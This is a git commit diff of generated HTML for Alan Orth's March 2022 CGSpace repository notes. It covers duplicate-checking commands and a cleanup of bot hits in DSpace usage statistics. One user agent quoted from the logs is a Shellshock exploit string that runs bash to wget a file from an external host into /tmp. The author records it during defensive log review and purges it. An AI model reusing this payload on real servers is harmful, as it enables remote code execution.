mirror of
https://github.com/alanorth/cgspace-notes.git
synced 2025-01-27 05:49:12 +01:00
Add notes for 2022-03-04
This commit is contained in:
@ -19,7 +19,7 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
|
||||
<meta property="og:type" content="article" />
|
||||
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2022-03/" />
|
||||
<meta property="article:published_time" content="2022-03-01T16:46:54+03:00" />
|
||||
<meta property="article:modified_time" content="2022-03-01T16:46:54+03:00" />
|
||||
<meta property="article:modified_time" content="2022-03-01T17:48:40+03:00" />
|
||||
|
||||
|
||||
|
||||
@ -34,7 +34,7 @@ $ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu&
|
||||
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
|
||||
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
|
||||
"/>
|
||||
<meta name="generator" content="Hugo 0.92.2" />
|
||||
<meta name="generator" content="Hugo 0.93.1" />
|
||||
|
||||
|
||||
|
||||
@ -44,9 +44,9 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
|
||||
"@type": "BlogPosting",
|
||||
"headline": "March, 2022",
|
||||
"url": "https://alanorth.github.io/cgspace-notes/2022-03/",
|
||||
"wordCount": "48",
|
||||
"wordCount": "349",
|
||||
"datePublished": "2022-03-01T16:46:54+03:00",
|
||||
"dateModified": "2022-03-01T16:46:54+03:00",
|
||||
"dateModified": "2022-03-01T17:48:40+03:00",
|
||||
"author": {
|
||||
"@type": "Person",
|
||||
"name": "Alan Orth"
|
||||
@ -124,11 +124,67 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
|
||||
<ul>
|
||||
<li>Send Gaia the last batch of potential duplicates for items 701 to 980:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
|
||||
$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">'fuuu'</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv
|
||||
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
|
||||
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
|
||||
</code></pre></div><!-- raw HTML omitted -->
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
|
||||
</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">'fuuu'</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv
|
||||
</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
|
||||
</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
|
||||
</span></span></code></pre></div><h2 id="2022-03-04">2022-03-04</h2>
|
||||
<ul>
|
||||
<li>Looking over the CGSpace Solr statistics from 2022-02
|
||||
<ul>
|
||||
<li>I see a few new bots, though once I expanded my search for user agents with “www” in the name I found so many more!</li>
|
||||
<li>Here are some of the more prevalent or weird ones:
|
||||
<ul>
|
||||
<li>axios/0.21.1</li>
|
||||
<li>Mozilla/5.0 (compatible; Faveeo/1.0; +http://www.faveeo.com)</li>
|
||||
<li>Nutraspace/Nutch-1.2 (<a href="http://www.nutraspace.com">www.nutraspace.com</a>)</li>
|
||||
<li>Mozilla/5.0 Moreover/5.1 (+http://www.moreover.com; <a href="mailto:webmaster@moreover.com">webmaster@moreover.com</a>)</li>
|
||||
<li>Mozilla/5.0 (compatible; Exploratodo/1.0; +http://www.exploratodo.com</li>
|
||||
<li>Mozilla/5.0 (compatible; GroupHigh/1.0; +http://www.grouphigh.com/)</li>
|
||||
<li>Crowsnest/0.5 (+http://www.crowsnest.tv/)</li>
|
||||
<li>Mozilla/5.0/Firefox/42.0 - nbertaupete95(at)gmail.com</li>
|
||||
<li>metha/0.2.27</li>
|
||||
<li>ZaloPC-win32-24v454</li>
|
||||
<li>Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x</li>
|
||||
<li>ZoteroTranslationServer/WMF (mailto:noc@wikimedia.org)</li>
|
||||
<li>FullStoryBot/1.0 (+https://www.fullstory.com)</li>
|
||||
<li>Link Validity Check From: <a href="http://www.usgs.gov">http://www.usgs.gov</a></li>
|
||||
<li>OSPScraper (+https://www.opensyllabusproject.org)</li>
|
||||
<li>() { :;}; /bin/bash -c "wget -O /tmp/bbb <a href="http://www.redel.net.br/1.php?id=3137382e37392e3138372e313832">www.redel.net.br/1.php?id=3137382e37392e3138372e313832</a>"</li>
|
||||
</ul>
|
||||
</li>
|
||||
<li>I submitted <a href="https://github.com/atmire/COUNTER-Robots/pull/52">a pull request to COUNTER-Robots</a> with some of these</li>
|
||||
</ul>
|
||||
</li>
|
||||
<li>I purged a bunch of hits from the stats using the <code>check-spider-hits.sh</code> script:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>]$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
|
||||
</span></span><span style="display:flex;"><span>Purging 6 hits from scalaj-http in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 5 hits from lua-resty-http in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 9 hits from AHC in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 7 hits from acebookexternalhit in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 1011 hits from axios\/[0-9] in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 2216 hits from Faveeo\/[0-9] in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 1164 hits from Moreover\/[0-9] in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 740 hits from Exploratodo\/[0-9] in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 585 hits from GroupHigh\/[0-9] in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 438 hits from Crowsnest\/[0-9] in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 1326 hits from nbertaupete95 in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 182 hits from metha\/[0-9] in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 68 hits from ZaloPC-win32-24v454 in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 1644 hits from Firefox\/x\.x in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 678 hits from ZoteroTranslationServer in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 27 hits from FullStoryBot in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 26 hits from Link Validity Check in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 26 hits from OSPScraper in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 1 hits from 3137382e37392e3138372e313832 in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 2755 hits from Nutch-[0-9] in statistics
|
||||
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
|
||||
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 12914
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>I added a few from that list to the local overrides in our DSpace while I wait for feedback from the COUNTER-Robots project</li>
|
||||
</ul>
|
||||
<!-- raw HTML omitted -->
|
||||
|
||||
|
||||
|
||||
|
Reference in New Issue
Block a user